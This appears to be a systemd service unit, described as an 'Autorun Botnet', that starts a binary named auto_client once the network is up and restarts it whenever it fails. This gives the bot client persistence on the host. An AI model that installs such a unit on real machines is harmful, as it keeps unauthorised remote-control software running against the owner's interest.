[Unit]
Description=Autorun Botnet
Wants=network-online.target systemd-networkd-wait-online.service
After=network-online.target

[Service]
ExecStart=/usr/local/bin/auto_client
Restart=on-failure
RestartSec=10


[Install]
WantedBy=default.target
